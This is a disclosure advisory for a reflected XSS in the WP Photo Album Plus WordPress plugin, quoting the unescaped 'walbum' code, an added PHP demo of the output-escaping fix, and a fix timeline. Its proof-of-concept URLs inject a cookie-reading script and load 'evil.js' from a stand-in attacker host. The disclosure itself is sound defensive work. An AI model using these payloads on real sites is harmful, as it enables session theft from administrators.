$_GET['walbum'] is not escaped.
File: wp-photo-album-plus\wppa-widget-admin.php
if (isset($_GET['walbum'])) {
    // Only passed through wppa_walbum_sanitize(); the value is never escaped for HTML output
    $walbum = wppa_walbum_sanitize($_GET['walbum']);
    wppa_update_option('wppa_widget_album', $walbum);
}
<?php _e('Or Edit:', 'wppa'); ?><input type="text" name="wppa-widget-albums" id="wppa-was" value="<?php echo $wppa_opt['wppa_widget_album'] ?>" />
The injected value is converted to lower case and must not contain any of the words all-sep, all, sep, topten or clr (each of these causes the whole value to be replaced):
File: wp-photo-album-plus\wppa-widget-functions.php
function wppa_walbum_sanitize( $walbum ) {
    $result = strtolower( $walbum );
    if ( strstr( $result, 'all-sep' ) ) $result = 'all-sep';
    elseif ( strstr( $result, 'all' ) ) $result = 'all';
    elseif ( strstr( $result, 'sep' ) ) $result = 'sep';
    elseif ( strstr( $result, 'topten' ) ) $result = 'topten';
    elseif ( strstr( $result, 'clr' ) ) $result = '';
    else {
        // Change multiple commas to one
        while ( substr_count( $result, ',,' ) ) $result = str_replace( ',,', ',', $result );
        // remove leading and trailing commas
        $result = trim( $result, ',' );
    }
    return $result;
}
Proof of Concept
Reflected XSS, visible to an administrator:
http://wordpress-install/wp-admin/admin.php?page=wppa_photo_of_the_day&walbum="><script>alert(document.cookie);</script>
Another variant for IE 11.0.9600, based on WhiteHat Security's "Bypassing Internet Explorer's Anti-Cross Site Scripting Filter":
http://wordpress-install/wp-admin/admin.php?page=wppa_photo_of_the_day&walbum="><script src=http://attacker-url/evil.js></script>
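As an added example (not part of the advisory or of the plugin's code), the sanitizer above is copied verbatim, fed the PoC value from the first URL, and rendered both as the vulnerable template does and with attribute-context escaping at the point of output. htmlspecialchars() stands in for WordPress's esc_attr(), which is not available outside WordPress.

```php
<?php
// Added example: the plugin's sanitizer (copied from the advisory) next to the output-side fix.

function wppa_walbum_sanitize( $walbum ) {
    $result = strtolower( $walbum );
    if ( strstr( $result, 'all-sep' ) ) $result = 'all-sep';
    elseif ( strstr( $result, 'all' ) ) $result = 'all';
    elseif ( strstr( $result, 'sep' ) ) $result = 'sep';
    elseif ( strstr( $result, 'topten' ) ) $result = 'topten';
    elseif ( strstr( $result, 'clr' ) ) $result = '';
    else {
        // Collapse repeated commas, then strip leading/trailing ones
        while ( substr_count( $result, ',,' ) ) $result = str_replace( ',,', ',', $result );
        $result = trim( $result, ',' );
    }
    return $result;
}

// Renders the widget input the way the vulnerable template does: raw interpolation.
function render_unescaped( $value ) {
    return '<input type="text" name="wppa-widget-albums" id="wppa-was" value="' . $value . '" />';
}

// Hardened rendering: escape for the HTML attribute context at the point of output.
// htmlspecialchars() with ENT_QUOTES stands in for esc_attr(); inside WordPress use esc_attr( $value ).
function render_escaped( $value ) {
    $safe = htmlspecialchars( $value, ENT_QUOTES, 'UTF-8' );
    return '<input type="text" name="wppa-widget-albums" id="wppa-was" value="' . $safe . '" />';
}

// The advisory's PoC value, as the plugin would receive it in $_GET['walbum'].
$input = '"><script>alert(document.cookie);</script>';

// None of the sanitizer's keywords (all-sep, all, sep, topten, clr) occur in the value
// and it is already lower case, so wppa_walbum_sanitize() returns it unchanged.
$sanitized = wppa_walbum_sanitize( $input );

echo "sanitized:  $sanitized\n";
echo "vulnerable: " . render_unescaped( $sanitized ) . "\n";
echo "hardened:   " . render_escaped( $sanitized ) . "\n";
```

Running the script shows the sanitizer returning the payload verbatim, the vulnerable markup with the attribute broken out of, and the hardened markup with the quote and angle brackets encoded as &quot;, &lt; and &gt;.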
Timeline
- 04-11-2014: Discovered
- 04-11-2014: Vendor notified
- 05-11-2014: Version 5.4.18 released, issue resolved